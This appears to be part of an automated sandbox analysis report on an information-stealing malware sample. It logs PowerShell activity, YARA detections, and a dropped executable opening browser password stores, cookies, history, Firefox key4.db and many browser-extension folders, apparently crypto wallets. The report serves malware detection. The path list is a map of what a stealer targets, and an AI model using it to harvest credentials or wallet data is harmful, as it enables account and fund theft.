                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_007FCBEA
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 1.2.skotes.exe.b70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.skotes.exe.b70000.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.file.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.skotes.exe.b70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1713621110.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.1741888657.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000003.2282737175.00000000046D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.1739503625.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1017355001\96ae609d19.exe, type: DROPPED
                              Source: Yara matchFile source: 00000016.00000002.2756608289.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.2737718865.0000000000BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000003.2741442978.0000000000880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.2741544851.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
